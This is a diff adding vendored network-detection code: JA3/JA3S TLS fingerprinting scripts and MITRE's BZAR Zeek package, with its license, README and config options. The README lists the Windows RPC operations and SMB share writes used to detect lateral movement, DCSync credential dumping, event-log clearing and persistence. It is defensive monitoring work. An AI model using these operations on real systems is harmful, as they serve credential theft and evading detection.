+    c$ssl$ja3 = tlsfp_1;
+
+# LOG FIELD VALUES ##
+#c$ssl$ja3_version = cat(c$tlsfp$client_version);
+#c$ssl$ja3_ciphers = c$tlsfp$client_ciphers;
+#c$ssl$ja3_extensions = c$tlsfp$extensions;
+#c$ssl$ja3_ec = c$tlsfp$e_curves;
+#c$ssl$ja3_ec_fmt = c$tlsfp$ec_point_fmt;
+#
+# FOR DEBUGGING ##
+#print "JA3: "+tlsfp_1+" Fingerprint String: "+ja3_string;
+
+}
--- a/capitalone/external/ja3/ja3s.zeek
+++ b/capitalone/external/ja3/ja3s.zeek
@ -0,0 +1,82 @@
+# This Zeek script appends JA3S (JA3 Server) to ssl.log
+# Version 1.1 (January 2020)
+# This builds a fingerprint for the SSL Server Hello packet based on SSL/TLS version, cipher picked, and extensions used. 
+# Designed to be used in conjunction with JA3 to fingerprint SSL communication between clients and servers.
+#
+# Authors: John B. Althouse (jalthouse@salesforce.com) Jeff Atkinson (jatkinson@salesforce.com)
+# Copyright (c) 2018, salesforce.com, inc.
+# All rights reserved.
+# Licensed under the BSD 3-Clause license. 
+# For full license text, see LICENSE.txt file in the repo root  or https://opensource.org/licenses/BSD-3-Clause
+#
+
+
+
+module JA3_Server;
+
+export {
+redef enum Log::ID += { LOG };
+}
+
+type JA3Sstorage: record {
+       server_version:      count &default=0 &log;
+       server_cipher:      count &default=0 &log;
+       server_extensions:   string &default="" &log;
+};
+
+redef record connection += {
+       ja3sfp: JA3Sstorage &optional;
+};
+
+redef record SSL::Info += {
+  ja3s:            string &optional &log;
+# LOG FIELD VALUES #
+#  ja3s_version:  string &optional &log;
+#  ja3s_cipher:  string &optional &log;
+#  ja3s_extensions: string &optional &log;
+};
+
+
+const sep = "-";
+event zeek_init() {
+    Log::create_stream(JA3_Server::LOG,[$columns=JA3Sstorage, $path="ja3sfp"]);
+}
+
+event ssl_extension(c: connection, is_orig: bool, code: count, val: string)
+{
+if ( ! c?$ja3sfp )
+    c$ja3sfp=JA3Sstorage();
+    if ( is_orig == F ) { 
+        if ( c$ja3sfp$server_extensions == "" ) {
+            c$ja3sfp$server_extensions = cat(code);
+        }
+        else {
+            c$ja3sfp$server_extensions = string_cat(c$ja3sfp$server_extensions, sep,cat(code));
+        }
+    }
+}
+
+@if ( ( Version::number >= 20600 ) || ( Version::number == 20500 && Version::info$commit >= 944 ) )
+event ssl_server_hello(c: connection, version: count, record_version: count, possible_ts: time, server_random: string, session_id: string, cipher: count, comp_method: count) &priority=1
+@else
+event ssl_server_hello(c: connection, version: count, possible_ts: time, server_random: string, session_id: string, cipher: count, comp_method: count) &priority=1
+@endif
+{
+    if ( !c?$ja3sfp )
+    c$ja3sfp=JA3Sstorage();
+    c$ja3sfp$server_version = version;
+    c$ja3sfp$server_cipher = cipher;
+    local sep2 = ",";
+    local ja3s_string = string_cat(cat(c$ja3sfp$server_version),sep2,cat(c$ja3sfp$server_cipher),sep2,c$ja3sfp$server_extensions);
+    local ja3sfp_1 = md5_hash(ja3s_string);
+    c$ssl$ja3s = ja3sfp_1;
+
+# LOG FIELD VALUES #
+#c$ssl$ja3s_version = cat(c$ja3sfp$server_version);
+#c$ssl$ja3s_cipher = cat(c$ja3sfp$server_cipher);
+#c$ssl$ja3s_extensions = c$ja3sfp$server_extensions;
+#
+# FOR DEBUGGING #
+#print "JA3S: "+ja3sfp_1+" Fingerprint String: "+ja3s_string;
+
+}
--- a/capitalone/external/mitre_bzar/LICENSE.txt
+++ b/capitalone/external/mitre_bzar/LICENSE.txt
@ -0,0 +1,201 @@
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
--- a/capitalone/external/mitre_bzar/README.md
+++ b/capitalone/external/mitre_bzar/README.md
@ -0,0 +1,323 @@
+# BZAR (Bro/Zeek ATT&CK-based Analytics and Reporting)
+
+## 1. Introduction
+
+The BZAR project uses the Bro/Zeek Network Security Monitor to detect ATT&CK-based 
+adversarial activity.
+
+[MITRE ATT&CK](https://attack.mitre.org/) is a 
+publicly-available, curated knowledge base for cyber adversary behavior, reflecting 
+the various phases of the adversary lifecycle and the platforms they are known to 
+target. The ATT&CK model includes behaviors of numerous threats groups.
+
+BZAR is a set of Bro/Zeek scripts utilizing the SMB and DCE-RPC protocol analyzers 
+and the File Extraction Framework to detect ATT&CK-like activity, raise notices, and 
+write to the Notice Log.
+
+### BZAR and CAR
+
+BZAR is a component of the [Cyber Analytics Repository](https://car.mitre.org). It was originally located within that library, but due to requirements for Zeek packages it was moved to its own repository. It's still managed as a component of CAR.
+
+## 2. Tuning BZAR for Your Environment
+
+BZAR must be tuned for your specific operational envrionment.  For example,
+some of the ATT&CK-like activity that BZAR detects may be authorized and legitimate
+activity in your environment. Therefore, these detections would produce lots of
+unnecessary entries in the Notice Log.  This can be tuned by the use of BZAR whitelists
+and by toggling on/off detection and/or reporting. See the CHANGES document for more 
+information.
+
+## 3. Complex Analytics for Detecting ATT&CK-like Activity
+
+The BZAR analytics use the Bro/Zeek Summary Statistics (SumStats) Framework to 
+combine two or more simple indicators in SMB and DCE-RPC traffic to detect 
+ATT&CK-like activity with a greater degree of confidence.  Three (3) BZAR 
+analytics are described below.
+
+### 3.1. SumStats Analytics for ATT&CK Lateral Movement and Execution
+
+Use SumStats to raise a Bro/Zeek Notice event if an SMB Lateral Movement 
+indicator (e.g., SMB File Write to a Windows Admin File Share: ADMIN$ or 
+C$ only) is observed together with a DCE-RPC Execution indicator against 
+the same (targeted) host, within a specified period of time.
+
+#### Relevant ATT&CK Techniques
+* [T1021.002 Remote Services: SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002/) (file shares only, not named pipes), and
+* [T1570 Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570/), and
+* One of the following:
+  * [T1569.002 System Services: Service Execution](https://attack.mitre.org/techniques/T1569/002/)
+  * [T1047 Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)
+  * [T1053.002 Scheduled Task/Job: At (Windows)](https://attack.mitre.org/techniques/T1053/002/)
+  * [T1053.005 Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)
+
+#### Relevant Indicators Detected by Bro/Zeek
+* `smb1_write_andx_response::c$smb_state$path` contains `ADMIN$` or `C$`
+* `smb2_write_request::c$smb_state$path**` contains `ADMIN$` or `C$`
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+    * `svcctl::CreateServiceW`
+    * `svcctl::CreateServiceA`
+    * `svcctl::StartServiceW`
+    * `svcctl::StartServiceA`
+    * `IWbemServices::ExecMethod`
+    * `IWbemServices::ExecMethodAsync`
+    * `atsvc::JobAdd`
+    * `ITaskSchedulerService::SchRpcRegisterTask`
+    * `ITaskSchedulerService::SchRpcRun`
+    * `ITaskSchedulerService::SchRpcEnableTask`
+
+**NOTE:** Preference would be to detect smb2_write_response event (instead of smb2_write_request), because it would confirm the file was actually written to the remote destination. Unfortunately, Bro/Zeek does not have an event for that SMB message-type yet.
+
+### 3.2. SumStats Analytics for ATT&CK Lateral Movement (Multiple Attempts)
+
+Use SumStats to raise a Bro/Zeek Notice event if multiple SMB Lateral 
+Movement indicators (e.g., multiple attempts to connect to a Windows Admin
+File Share: ADMIN$ or C$ only) are observed originating from the same host, 
+regardless of write-attempts and regardless of whether or not any connection
+is successful --just connection attempts-- within a specified period of time.
+
+#### Relevant ATT&CK Techniques
+* [T1021.002 Remote Services: SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002/) (file shares only, not named pipes)
+
+#### Indicators detected by Bro/Zeek
+* `smb1_tree_connect_andx_request::c$smb_state$path` contains `ADMIN$` or `C$`
+* `smb2_tree_connect_request::c$smb_state$path` contains `ADMIN$` or `C$`
+
+### 3.3. SumStats Analytics for ATT&CK Discovery
+
+Use SumStats to raise a Bro/Zeek Notice event if multiple instances of 
+DCE-RPC Discovery indicators are observed originating from the same host, 
+within a specified period of time.
+
+#### Relevant ATT&CK Techniques
+* [T1016 System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016/)
+* [T1018 Remote System Discovery ](https://attack.mitre.org/techniques/T1018/)
+* [T1033 System Owner/User Discovery ](https://attack.mitre.org/techniques/T1033/)
+* [T1069 Permission Groups Discovery ](https://attack.mitre.org/techniques/T1069/)
+* [T1082 System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+* [T1083 File & Directory Discovery](https://attack.mitre.org/techniques/T1083/)
+* [T1087 Account Discovery](https://attack.mitre.org/techniques/T1087/)
+* [T1124 System Time Discovery](https://attack.mitre.org/techniques/T1124/)
+* [T1135 Network Share Discovery](https://attack.mitre.org/techniques/T1135/)
+
+#### Relevant Indicator(s) Detected by Bro/Zeek
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+  * `lsarpc::LsarEnumerateAccounts`
+  * `lsarpc::LsarEnumerateAccountRights`
+  * `lsarpc::LsarEnumerateAccountsWithUserRight`
+  * `lsarpc::LsarEnumeratePrivileges`
+  * `lsarpc::LsarEnumeratePrivilegesAccount`
+  * `lsarpc::LsarEnumerateTrustedDomainsEx`
+  * `lsarpc::LsarGetSystemAccessAccount`
+  * `lsarpc::LsarGetUserName`
+  * `lsarpc::LsarLookupNames`
+  * `lsarpc::LsarLookupNames2`
+  * `lsarpc::LsarLookupNames3`
+  * `lsarpc::LsarLookupNames4`
+  * `lsarpc::LsarLookupPrivilegeDisplayName`
+  * `lsarpc::LsarLookupPrivilegeName`
+  * `lsarpc::LsarLookupPrivilegeValue`
+  * `lsarpc::LsarLookupSids`
+  * `lsarpc::LsarLookupSids2`
+  * `lsarpc::LsarLookupSids3`
+  * `lsarpc::LsarQueryDomainInformationPolicy`
+  * `lsarpc::LsarQueryInfoTrustedDomain`
+  * `lsarpc::LsarQueryInformationPolicy`
+  * `lsarpc::LsarQueryInformationPolicy2`
+  * `lsarpc::LsarQueryTrustedDomainInfo`
+  * `lsarpc::LsarQueryTrustedDomainInfoByName`
+  * `samr::SamrLookupNamesInDomain`
+  * `samr::SamrLookupIdsInDomain`
+  * `samr::SamrLookupDomainInSamServer`
+  * `samr::SamrGetGroupsForUser`
+  * `samr::SamrGetAliasMembership`
+  * `samr::SamrGetMembersInAlias`
+  * `samr::SamrGetMembersInGroup`
+  * `samr::SamrGetUserDomainPasswordInformation`
+  * `samr::SamrEnumerateAliasesInDomain`
+  * `samr::SamrEnumerateUsersInDomain`
+  * `samr::SamrEnumerateGroupsInDomain`
+  * `samr::SamrEnumerateDomainsInSamServer`
+  * `samr::SamrQueryInformationAlias`
+  * `samr::SamrQueryInformationDomain`
+  * `samr::SamrQueryInformationDomain2`
+  * `samr::SamrQueryInformationGroup`
+  * `samr::SamrQueryInformationUser`
+  * `samr::SamrQueryInformationUser2`
+  * `samr::SamrQueryDisplayInformation`
+  * `samr::SamrQueryDisplayInformation2`
+  * `samr::SamrQueryDisplayInformation3`
+  * `srvsvc::NetrConnectionEnum`
+  * `srvsvc::NetrFileEnum`
+  * `srvsvc::NetrRemoteTOD`
+  * `srvsvc::NetrServerAliasEnum`
+  * `srvsvc::NetrServerGetInfo`
+  * `srvsvc::NetrServerTransportEnum`
+  * `srvsvc::NetrSessionEnum`
+  * `srvsvc::NetrShareEnum`
+  * `srvsvc::NetrShareGetInfo`
+  * `wkssvc::NetrWkstaGetInfo`
+  * `wkssvc::NetrWkstaTransportEnum`
+  * `wkssvc::NetrWkstaUserEnum`
+
+
+## 4. Simple Indicators for Detecting ATT&CK-like Activity
+
+In addition to the analytics described above, BZAR uses simple indicators 
+within SMB and DCE-RPC traffic to detect ATT&CK-like activity, although with 
+a lesser degree of confidence than detection via the SumStats analytics. 
+The BZAR indicators are grouped into six (6) categories, as described below.
+
+### 4.1. Indicators for ATT&CK Lateral Movement
+
+Raise a Bro/Zeek Notice event if a single instance of an SMB Lateral 
+Movement indicator (e.g., SMB File Write to a Windows Admin File Share: 
+ADMIN$ or C$ only) is observed, which indicates ATT&CK-like activity.
+
+#### Relevant ATT&CK Techniques
+
+* [T1021.002 Remote Services: SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002/) (file shares only, not named pipes)
+* [T1570 Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570/)
+
+#### Relevant Indicator(s) Detected by Bro/Zeek
+
+* `smb1_write_andx_response::c$smb_state$path` contains `ADMIN$` or `C$`
+* `smb2_write_request::c$smb_state$path**` contains `ADMIN$` or `C$`
+
+**NOTE:** Preference would be to detect smb2_write_response event (instead of smb2_write_request), because it would confirm the file was actually written to the remote destination. Unfortunately, Bro/Zeek does not have an event for that SMB message-type yet.
+
+### 4.2. Indicators for File Extraction Framework
+
+Launch the Bro/Zeek File Extraction Framework to save a copy of the file 
+associated with ATT&CK-like Lateral Movement onto a remote system.  Raise 
+a Bro Notice event for the Lateral Movement Extracted File.
+
+#### Relevant ATT&CK Techniques
+
+* [T1021.002 Remote Services: SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002/) (file shares only, not named pipes)
+* [T1570 Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570/)
+
+#### Relevant Indicator(s) Detected by Bro/Zeek
+
+* `smb1_write_andx_response::c$smb_state$path` contains `ADMIN$` or `C$`
+* `smb2_write_request::c$smb_state$path**` contains `ADMIN$` or `C$`
+
+**NOTE:** Preference would be to detect smb2_write_response event (instead of smb2_write_request), because it would confirm the file was actually written to the remote destination. Unfortunately, Bro/Zeek does not have an event for that SMB message-type yet.
+
+### 4.3. Indicators for ATT&CK Credential Access
+
+Raise a Bro/Zeek Notice event if a single instance of any of the following 
+Windows DCE-RPC functions (endpoint::operation) is observed, which 
+indicates ATT&CK-like Credential Access techniques on the remote system. 
+
+#### Relevant ATT&CK Technique(s)
+* [T1003.006 OS Credential Dumping: DCSync](https://attack.mitre.org/techniques/T1003/006/)
+
+#### Relevant Indicator(s) Detected by Bro/Zeek
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+  * `drsuapi::DRSReplicaSync`
+  * `drsuapi::DRSGetNCChanges`
+
+### 4.4. Indicators for ATT&CK Defense Evasion
+
+Raise a Bro/Zeek Notice event if a single instance of any of the following  
+Windows DCE-RPC functions (endpoint::operation) is observed, which 
+indicates ATT&CK-like Defense Evasion techniques on the remote system.
+
+#### Relevant ATT&CK Techniques
+* [T1070.001 Indicator Removal on Host: Clear Windows Event Logs](https://attack.mitre.org/techniques/T1070/001/)
+   
+#### Relevant Indicator(s) Detected by Bro/Zeek
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+    * `eventlog::ElfrClearELFW`
+    * `eventlog::ElfrClearELFA`
+    * `IEventService::EvtRpcClearLog`
+
+### 4.5. Indicators for ATT&CK Execution
+
+Raise a Bro/Zeek Notice event if a single instance of any of the following
+Windows DCE-RPC functions (endpoint::operation) is observed, which 
+indicates ATT&CK-like Execution techniques on the remote system.
+
+#### Relevant ATT&CK Technique(s)
+* [T1569.002 System Services: Service Execution](https://attack.mitre.org/techniques/T1569/002/)
+* [T1047 Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)
+* [T1053.002 Scheduled Task/Job: At (Windows)](https://attack.mitre.org/techniques/T1053/002/)
+* [T1053.005 Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)
+
+#### Relevant Indicator(s) Detected by Bro/Zeek
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+    * `svcctl::CreateServiceW`
+    * `svcctl::CreateServiceA`
+    * `svcctl::StartServiceW`
+    * `svcctl::StartServiceA`
+    * `IWbemServices::ExecMethod`
+    * `IWbemServices::ExecMethodAsync`
+    * `atsvc::JobAdd`
+    * `ITaskSchedulerService::SchRpcRegisterTask`
+    * `ITaskSchedulerService::SchRpcRun`
+    * `ITaskSchedulerService::SchRpcEnableTask`
+
+### 4.6. Indicators for ATT&CK Persistence
+Raise a Bro/Zeek Notice event if a single instance of any of the following
+Windows DCE-RPC functions (endpoint::operation) is observed, which 
+indicates ATT&CK-like Persistence techniques on the remote system.
+
+#### Relevant ATT&CK Technique(s):
+* [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](https://attack.mitre.org/techniques/T1547/004/)
+* [T1547.010 Boot or Logon Autostart Execution: Port Monitors](https://attack.mitre.org/techniques/T1547/010/)
+
+#### Relevant Indicator(s) Detected by Bro/Zeek
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+    * `ISecLogon::SeclCreateProcessWithLogonW`
+    * `ISecLogon::SeclCreateProcessWithLogonExW`
+    * `IRemoteWinspool::RpcAsyncAddMonitor`
+    * `IRemoteWinspool::RpcAsyncAddPrintProcessor`
+    * `spoolss::RpcAddMonitor` # a.k.a. winspool | spoolss
+    * `spoolss::RpcAddPrintProcessor` # a.k.a. winspool | spoolss
+
+### 4.7. Indicators for ATT&CK Impact
+
+Raise a Bro/Zeek Notice event if a single instance of any of the following  
+Windows DCE-RPC functions (endpoint::operation) is observed, which 
+indicates ATT&CK-like Impact techniques on the remote system.
+
+#### Relevant ATT&CK Techniques
+* [T1529 System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529/)
+   
+#### Relevant Indicator(s) Detected by Bro/Zeek
+* `dce_rpc_response::c$dce_rpc$endpoint + c$dce_rpc$operation` contains any of the following:
+    * `InitShutdown::BaseInitiateShutdown`
+    * `InitShutdown::BaseInitiateShutdownEx`
+    * `WindowsShutdown::WsdrInitiateShutdown`
+    * `winreg::BaseInitiateSystemShutdown`
+    * `winreg::BaseInitiateSystemShutdownEx`
+    * `winstation_rpc::RpcWinStationShutdownSystem`
+    * `samr::SamrShutdownSamServer` # MSDN says not used on the wire
+
+## 5. Additional DCE-RPC Interfaces and Methods
+
+The BZAR project adds 144 more Microsoft DCE-RPC Interface UUIDs
+(a.k.a. "endpoints") to the Bro/Zeek DCE_RPC::uuid_endpoint_map.
+
+The BZAR project also adds 1,145 Microsoft DCE-RPC Interface Methods 
+(a.k.a. "operations") to the Bro/Zeek DCE_RPC::operations.
+
+See the Bro/Zeek script 'bzar_dce-rpc_consts' for more information.
+
+Most of the DCE-RPC endpoints and operations defined in
+'bzar_dce-rpc_consts' were merged into Zeek's main product line,
+version 3.2.0-dev.565 | 2020-05-26 21:55:54 +0000.  Ref: https://github.com/zeek/zeek/blob/master/scripts/base/protocols/dce-rpc/consts.zeek#L92
+
+## 6. References
+1. Microsoft Developer Network (MSDN) Library. MSDN Library > Open Specifications > Protocols > Windows Protocols > Technical Documents. https://msdn.microsoft.com/en-us/library/jj712081.aspx
+2. Marchand, "Windows Network Services Internals". 2006. http://index-of.es/Windows/win_net_srv.pdf
+
+## 7. Contributing
+
+Contributions are welcome. This code is licensed under the same terms as the CAR repository. See the [LICENSE](LICENSE.txt) file and the Developer Certificate of Origin certification in the [CONTRIBUTING](/CONTRIBUTING.md) file in the root of the repository.
+
+
+The information in this README file is current, as of 10/09/2020.
+
+*Copyright 2018 The MITRE Corporation.  All Rights Reserved.  
+Approved for public release.  Distribution unlimited.  Case number 18-2489.*
--- a/capitalone/external/mitre_bzar/load.zeek
+++ b/capitalone/external/mitre_bzar/load.zeek
@ -0,0 +1,24 @@
+#
+# File: __load__.zeek
+# Created: 20180701
+# Updated: 20191121
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+@load ./bzar_config_options
+
+@load ./main
+@load ./bzar_dce-rpc_consts
+@load ./bzar_dce-rpc_report
+@load ./bzar_dce-rpc_detect
+@load ./bzar_smb_consts
+@load ./bzar_smb_report
+@load ./bzar_smb1_detect
+@load ./bzar_smb2_detect
+@load ./bzar_files
+
+@load-sigs ./dpd.sig
+
+#end __load__.zeek
--- a/capitalone/external/mitre_bzar/bzar_config_options.zeek
+++ b/capitalone/external/mitre_bzar/bzar_config_options.zeek
@ -0,0 +1,405 @@
+#
+# File: bzar_config_options.zeek
+# Created: 20191121
+# Updated: 20201009
+#
+# Copyright 2018 The MITRE Corporation.  All Rights Reserved.
+# Approved for public release.  Distribution unlimited.  Case number 18-3868.
+#
+
+module BZAR;
+
+export
+{
+	# BZAR Configuration Options
+
+	#
+	# BZAR Actions - ATT&CK Indicators to Detect and Report
+	#
+	# Description:
+	#	These config options should be tuned for your specific environment.
+	#	Use the Zeek Configuration Framework to change the default values 
+	#	during runtime.
+	#
+	# xxx_detect_option:
+	#	Option to control whether or not to detect this ATT&CK indicator.
+	#	If set to False, then it effectively disables _report_option, too.
+	#
+	# xxx_report_option:
+	#	Option to control whether or not to write to the Notice Log.
+	#	If _detect_option is False, then this option has no effect.
+	#
+
+	# ATTACK::Credential_Access
+	option t1003_006_detect_option = T;
+	option t1003_006_report_option = T;
+
+	# ATTACK::Defense_Evasion
+	option t1070_001_detect_option = T;
+	option t1070_001_report_option = T;
+
+	# ATTACK::Execution
+	option t1569_002_detect_option = T;
+	option t1569_002_report_option = T;
+
+	option t1047_detect_option = T;
+	option t1047_report_option = T;
+
+	option t1053_002_detect_option = T;
+	option t1053_002_report_option = T;
+
+	option t1053_005_detect_option = T;
+	option t1053_005_report_option = T;
+
+	# ATTCK::Impact
+	option t1529_detect_option = T;
+	option t1529_report_option = T;
+
+	# ATTACK::Lateral_Movement
+	# Options to control whether or not to detect/report
+	# 'Remote File Copy/Lateral Tool Transfer to Windows Admin File Share'.
+
+	option t1021_002_t1570_detect_option = T;
+	option t1021_002_t1570_report_option = T;
+
+	# Options to control whether or not to detect/report
+	# 'Windows Admin File Share' by itself.
+	# RECOMMENDATION: Do not report this ATT&CK indicator without
+	# additional context.
+
+	option t1021_002_detect_option = T;
+	option t1021_002_report_option = F;
+
+	# Option to control whether or not to detect/report
+	# 'Remote File Copy/Lateral Tool Transfer' to any other
+	# network share, not related to 'Windows Admin File Share'.
+	# RECOMMENDATION: Do not report this ATT&CK indicator without
+	# additional context.
+
+	option t1570_detect_option = T;
+	option t1570_report_option = F;
+
+	# ATTACK::Lateral_Movement_Multiple_Attempts
+	# Aggregate SumStats Indicator
+	# Option to control whether or not to write this SumStats indicator to Notice Log.
+	# It relies on t1021_002_detect_option.  If t1021_002_detect_option is False, this option has no effect.
+
+	option t1021_002_multiple_attempts_report_option = T;
+
